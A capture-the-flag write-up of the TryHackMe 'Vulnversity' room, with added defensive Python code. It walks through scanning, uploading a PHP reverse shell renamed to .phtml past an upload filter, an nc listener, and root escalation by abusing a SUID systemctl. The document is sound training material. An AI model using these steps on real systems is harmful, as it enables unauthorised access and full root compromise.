Vulnversity Room WriteUp
This is my write-up for the Vulnversity room on TryHackMe.
I will not go deep into why the answer is "x" or "y"; that part is your job, to understand what the room is trying to teach you.
Task 1 - Deploy the machine
Fire up the machine
Task 2 - Reconnaissance
Scan the box, how many ports are open?
6
Default Nmap scan:
nmap -sC -sV $IP
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA)
| 256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA)
|_ 256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Vuln University
|_http-server-header: Apache/2.4.18 (Ubuntu)
4446/tcp filtered n1-fwp
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

- From the result above we can see that there are 6 ports open and 1 port is filtered
What version of the squid proxy is running on the machine?
3.5.12
From the Nmap scan above: 3128/tcp open http-proxy Squid http proxy 3.5.12

How many ports will nmap scan if the flag -p-400 was used?
400
Nmap usage:
nmap --help | grep "\-p"
-p <port ranges>: Only scan specified ports
Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9

- As we can see from above, the flag -p will make nmap scan for the specified ports. If you want to scan 400 ports you can use the flag -p1-400, and it would be equal to -p-400
Using the nmap flag -n what will it not resolve?
DNS
Nmap usage:
nmap --help | grep "\-n"
-n/-R: Never do DNS resolution/Always resolve [default: sometimes]

What is the most likely operating system this machine is running?
Ubuntu
From the Nmap scan above: the OpenSSH banner (Ubuntu 4ubuntu2.7) and the Apache banner ((Ubuntu)) both report Ubuntu.

What port is the web server running on?
3333
From the Nmap scan above: 3333/tcp open http Apache httpd 2.4.18 ((Ubuntu))
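As an added example (not part of the original write-up), here is a small Python parser for the PORT/STATE/SERVICE/VERSION lines of the scan above that answers this task's questions programmatically: open and filtered port counts, the squid version, the web server port, the OS hinted by the banners. The NMAP_OUTPUT string is a constructed copy of the scan's port lines, and port_count() implements the -p range arithmetic for a plain comma-separated spec (so "-400" gives 400); it does not handle the T:/U:/S: protocol prefixes shown in the nmap help text.

```python
import re
from dataclasses import dataclass

# Constructed sample: the port lines from the nmap -sC -sV output above
# (script output lines starting with | are omitted; the parser skips them anyway).
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open http-proxy Squid http proxy 3.5.12
3333/tcp open http Apache httpd 2.4.18 ((Ubuntu))
4446/tcp filtered n1-fwp
"""

# port/proto  state  service  [version text]
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


@dataclass
class PortEntry:
    port: int
    proto: str
    state: str
    service: str
    version: str


def parse_nmap(text):
    """Turn nmap's normal output into PortEntry records, skipping headers and script lines."""
    entries = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue
        port, proto, state, service, version = m.groups()
        entries.append(PortEntry(int(port), proto, state, service, version or ""))
    return entries


def count_state(entries, state):
    """How many entries are in the given state ('open', 'filtered', ...)."""
    return sum(1 for e in entries if e.state == state)


def version_of(entries, service):
    """First dotted version number in the version column of the named service."""
    for e in entries:
        if e.service == service:
            m = re.search(r"\d+(?:\.\d+)+", e.version)
            return m.group(0) if m else e.version
    return None


def ports_for_service(entries, service):
    """Open ports whose detected service matches the name."""
    return [e.port for e in entries if e.service == service and e.state == "open"]


def guess_os(entries):
    """Crude OS guess from the version banners, the same reasoning used for the room's question."""
    banners = " ".join(e.version for e in entries)
    for name in ("Ubuntu", "Debian", "CentOS", "Windows"):
        if name in banners:
            return name
    return "unknown"


def port_count(spec):
    """Number of ports an nmap -p spec covers: '22' -> 1, '-400' -> 400, '1-65535' -> 65535."""
    total = 0
    for part in spec.split(","):
        lo, sep, hi = part.partition("-")
        if not sep:
            total += 1
        else:
            total += int(hi or 65535) - int(lo or 1) + 1
    return total


if __name__ == "__main__":
    found = parse_nmap(NMAP_OUTPUT)
    print("open:", count_state(found, "open"), "filtered:", count_state(found, "filtered"))
    print("squid:", version_of(found, "http-proxy"))
    print("web port(s):", ports_for_service(found, "http"))
    print("os:", guess_os(found))
    print("-p-400 covers", port_count("-400"), "ports")
```

Running it against the room's scan reproduces the answers above: 6 open, 1 filtered, squid 3.5.12, web server on 3333, Ubuntu, and 400 ports for -p-400.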
Task 3 - Locating directories using GoBuster
What is the directory that has an upload form page?
/internal/
Gobuster brute-force directories:
gobuster dir -u http://$IP:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/images (Status: 301) [Size: 320] [--> http://10.10.220.94:3333/images/]
/css (Status: 301) [Size: 317] [--> http://10.10.220.94:3333/css/]
/js (Status: 301) [Size: 316] [--> http://10.10.220.94:3333/js/]
/fonts (Status: 301) [Size: 319] [--> http://10.10.220.94:3333/fonts/]
/internal (Status: 301) [Size: 322] [--> http://10.10.220.94:3333/internal/]

- After visiting all the links above, we will see that the upload form is on /internal/
Task 4 - Compromise the webserver
What is the name of the user who manages the webserver?
bill
First, update the php-reverse-shell.php to match your IP and port. If you don't know where the php-reverse-shell.php is, you can use locate to find it:

Locate the php-reverse-shell.php:
locate php-reverse-shell.php

Update the php reverse shell:
nano php-reverse-shell.php
$ip = 'YOUR IP'; // CHANGE THIS
$port = YOUR PORT; // CHANGE THIS

- Now we change the name from php-reverse-shell.php to php-reverse-shell.phtml

Change name of the file:
mv php-reverse-shell.php php-reverse-shell.phtml

- Set up a listener and activate the file to make a call back to our listener, and we should get a shell

Set up listener:
nc -nvlp YOUR PORT

Go over to http://$IP:3333/internal/uploads/php-reverse-shell.phtml to make the call back.

We can upgrade the shell with python3.
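The rename from .php to .phtml works because an upload filter that only blocks the literal .php extension does not cover the other extensions Ubuntu's Apache PHP module executes (its php conf hands .php, .phar and .phtml to the PHP handler). As an added example, not from the room or this write-up, here is that weak blocklist check next to an allowlist check that would have rejected php-reverse-shell.phtml; the extension sets, file names and helper names are constructed for the example.

```python
import os
import re

# Extensions a default Ubuntu Apache + libapache2-mod-php setup hands to the PHP
# handler (its php conf matches .php, .phar and .phtml).
PHP_HANDLER_EXTENSIONS = {".php", ".phar", ".phtml"}

# Extensions the upload form is meant to accept (constructed for the example).
ALLOWED_UPLOAD_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".pdf"}

# Base name: letters, digits, underscore, hyphen only; no dots, so no double extensions.
SAFE_BASENAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def is_executable_by_php_handler(filename):
    """True when Apache would run the file as PHP under the default Ubuntu config."""
    return os.path.splitext(filename)[1].lower() in PHP_HANDLER_EXTENSIONS


def weak_blocklist_check(filename):
    """The weak check: refuses only the literal .php extension.  Renaming the
    reverse shell to .phtml slips past it, which is exactly what the walkthrough does."""
    return not filename.lower().endswith(".php")


def allowlist_check(filename):
    """Hardened check: no path characters, a plain base name, exactly one
    extension, and that extension drawn from the allowlist."""
    if any(ch in filename for ch in ("/", "\\", "\x00")):
        return False
    base, ext = os.path.splitext(filename)
    if not SAFE_BASENAME.match(base):      # rejects 'shell.phtml.jpg' and '.htaccess'
        return False
    return ext.lower() in ALLOWED_UPLOAD_EXTENSIONS


def classify(filename):
    """Summarise what each check does with a candidate upload name."""
    return {
        "name": filename,
        "blocklist_accepts": weak_blocklist_check(filename),
        "allowlist_accepts": allowlist_check(filename),
        "php_would_run_it": is_executable_by_php_handler(filename),
    }


if __name__ == "__main__":
    for name in ("photo.jpg", "php-reverse-shell.php", "php-reverse-shell.phtml",
                 "shell.phtml.jpg", "../../photo.jpg", ".htaccess"):
        print(classify(name))
```

The extension check is only one layer: the uploads directory on this box sits under the document root (/internal/uploads/), so anything the handler recognises runs as soon as it is requested. Storing uploads outside the document root, or in a directory where the PHP handler is disabled, removes that second half of the problem regardless of the filename filter.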
Upgrade the shell:
which python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash")';
export TERM=xterm

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
...
bill:x:1000:1000:,,,:/home/bill:/bin/bash

What is the user flag?
8b[REDACTED]db

Get the user flag:
cat /home/bill/user.txt
8b[REDACTED]db
Task 5 - Privilege Escalation
On the system, search for all SUID files. What file stands out?
/bin/systemctl
Find all the SUID files:
find / -uid 0 -perm -4000 -type f 2>/dev/null
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/squid/pinger
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/bin/su
/bin/ntfs-3g
/bin/mount
/bin/ping6
/bin/umount
/bin/systemctl
/bin/ping
/bin/fusermount
/sbin/mount.cifs

Become root and get the last flag (/root/root.txt)
a5[REDACTED]d5
- Look for a way to exploit systemctl on GTFOBins

Exploit systemctl SUID:
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
systemctl link $TF
systemctl enable --now $TF
cat /tmp/output
a5[REDACTED]d5
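From the defender's side, as an added example that is not part of the room or this write-up: the SUID listing from the find command above checked against a baseline of expected setuid binaries (so /bin/systemctl is the one that stands out), plus a check for unit files symlinked into /etc/systemd/system from volatile directories, which is the trace that `systemctl link` on a unit file under /tmp leaves behind. The baseline is an assumption made for the example (a real one is recorded from a known-good image of the same build), and the demo builds its own throw-away directory tree instead of touching the real systemd directories.

```python
import os
import shutil
import tempfile

# Constructed sample: the output of the find command above.
SUID_FOUND = """
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/squid/pinger
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/bin/su
/bin/ntfs-3g
/bin/mount
/bin/ping6
/bin/umount
/bin/systemctl
/bin/ping
/bin/fusermount
/sbin/mount.cifs
""".split()

# Assumed baseline (an assumption for this example, not a vendor list): the setuid
# binaries a stock install of this kind of host is expected to carry.
SUID_BASELINE = {
    "/usr/bin/newuidmap", "/usr/bin/chfn", "/usr/bin/newgidmap", "/usr/bin/sudo",
    "/usr/bin/chsh", "/usr/bin/passwd", "/usr/bin/pkexec", "/usr/bin/newgrp",
    "/usr/bin/gpasswd", "/usr/lib/snapd/snap-confine",
    "/usr/lib/policykit-1/polkit-agent-helper-1", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/lib/squid/pinger",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic", "/bin/su", "/bin/ntfs-3g",
    "/bin/mount", "/bin/ping6", "/bin/umount", "/bin/ping", "/bin/fusermount",
    "/sbin/mount.cifs",
}


def unexpected_suid(found, baseline):
    """Setuid files present on the host but absent from the baseline."""
    return sorted(set(found) - set(baseline))


def linked_units_from(unit_dir, volatile_prefixes):
    """Names of units in unit_dir that are symlinks resolving into one of the
    volatile directories (/tmp, /var/tmp, /dev/shm on a real host)."""
    prefixes = [os.path.realpath(p).rstrip("/") + "/" for p in volatile_prefixes]
    hits = []
    for name in sorted(os.listdir(unit_dir)):
        path = os.path.join(unit_dir, name)
        if not os.path.islink(path):
            continue
        target = os.path.realpath(path)
        if any(target.startswith(p) for p in prefixes):
            hits.append(name)
    return hits


def demo_linked_unit_check():
    """Build a throw-away tree shaped like what `systemctl link` leaves behind
    (constructed for the example) and run the check against it."""
    root = tempfile.mkdtemp()
    try:
        fake_tmp = os.path.join(root, "tmp")
        unit_dir = os.path.join(root, "etc", "systemd", "system")
        os.makedirs(fake_tmp)
        os.makedirs(unit_dir)
        unit = os.path.join(fake_tmp, "tmp.abc123.service")   # mktemp-style unit in /tmp
        with open(unit, "w") as f:
            f.write("[Service]\nType=oneshot\nExecStart=/bin/true\n")
        os.symlink(unit, os.path.join(unit_dir, "tmp.abc123.service"))
        with open(os.path.join(unit_dir, "cron.service"), "w") as f:  # ordinary unit file
            f.write("[Service]\nExecStart=/usr/sbin/cron -f\n")
        return linked_units_from(unit_dir, (fake_tmp,))
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    print("unexpected SUID:", unexpected_suid(SUID_FOUND, SUID_BASELINE))
    print("units linked from volatile dirs:", demo_linked_unit_check())
```

On a real host you would call linked_units_from("/etc/systemd/system", ("/tmp", "/var/tmp", "/dev/shm")) and also review multi-user.target.wants/, where `systemctl enable` adds a second symlink; the setuid bit on /bin/systemctl itself is the finding to remove, since stock Ubuntu does not ship it that way.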